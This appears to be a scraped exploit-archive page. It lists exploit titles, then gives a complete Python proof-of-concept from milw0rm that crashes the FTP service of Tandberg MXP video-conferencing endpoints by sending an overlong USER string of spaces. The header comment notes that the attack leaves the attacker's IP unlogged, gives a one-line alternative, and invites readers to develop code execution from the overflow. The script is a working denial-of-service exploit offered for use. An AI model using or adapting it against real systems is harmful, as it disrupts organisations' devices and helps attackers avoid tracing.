477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
74 lines
4.2 KiB
Python
Executable file
74 lines
4.2 KiB
Python
Executable file
#########################################################################################
|
|
# #
|
|
# TANDBERG BoF v0.1 - Tandberg MXP F7.0< #
|
|
# Buffer Overflow Vulnerability PoC #
|
|
# By otokoyama #
|
|
# #
|
|
# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly #
|
|
# known as a blank space.(very simple) #
|
|
# [+] The BOF happens due to the system passing all usernames:passwords to a log file. #
|
|
# #
|
|
# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public. #
|
|
# #
|
|
# #
|
|
# This is a good vuln due to the system not logging the IP address of the attacker. #
|
|
# To be able to tell who was causing this you would need to grab a log from the FW #
|
|
# and as TANDBERG does not provide timestamps on their endpoints pre f8.0 #
|
|
# you would need to have recieved a SNMP notification to TMS that the system rebooted #
|
|
# and cross reference that with the IP's connecting through the firewall. #
|
|
# This is particularily annoying due to the fact that systems reboot all the time #
|
|
# As endusers are constantly turning them on\off #
|
|
# At this point the sysadmin goes "TANDBERG Can we buy an Expressway?" #
|
|
# #
|
|
# As far as it goes, creating a connectback shell would be difficult #
|
|
# this is mainly due to the process on the Endpoint that detects a memory mismatch #
|
|
# and subsequently reboots the system(security measure). #
|
|
# #
|
|
# To create a successfull exploit outside of the DoS #
|
|
# you would need to locate the memory address of the process that reboots the system #
|
|
# (there might even be a fallback on that) This is generally too cumbersome as #
|
|
# this embeded system doesn't do anything fun anyway (why would you want access) #
|
|
# #
|
|
# In saying that, #
|
|
# it would be fairly trivial to use the BoF to write something to the memory. #
|
|
# you will notice buffer below only generates the exception 0x0200 aka Machine Check. #
|
|
# Increasing the char sent to the unit will change that error to exception 0x1100 #
|
|
# meaning we are sending the MINIMUM required length to overflow the buffer. #
|
|
# I have done the hardwork for you! Please email me if you get some encodes. #
|
|
# BTW, This could be done like this: #
|
|
# from ftplib import FTP #
|
|
# ftp = FTP('ip.addr') #
|
|
# ftp.login(' '*251) #
|
|
# ftp.quit()....but its dirty. #
|
|
# #
|
|
# shoutouts:mabus,gso #
|
|
#########################################################################################
|
|
|
|
import socket
|
|
import struct
|
|
import time
|
|
import sys
|
|
|
|
|
|
buff='USER '+' '*251+'\r\n'
|
|
|
|
if len(sys.argv)!=3:
|
|
print "\n[+] Usage: %s <ip> <port>"%sys.argv[0]
|
|
print "[-] Example: python poc.py 192.168.1.23 23\n"
|
|
sys.exit(0)
|
|
|
|
try:
|
|
|
|
print "[+] Connecting... %s" %sys.argv[1]
|
|
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connect=s.connect((sys.argv[1],int(sys.argv[2])))
|
|
print "[+] Sending data..."
|
|
time.sleep(1.2)
|
|
s.send(buff)
|
|
print "[+] Deed Done"
|
|
s.recv(1024)
|
|
|
|
except:
|
|
print "[#] Unable to connect"
|
|
|
|
# milw0rm.com [2009-07-13]
|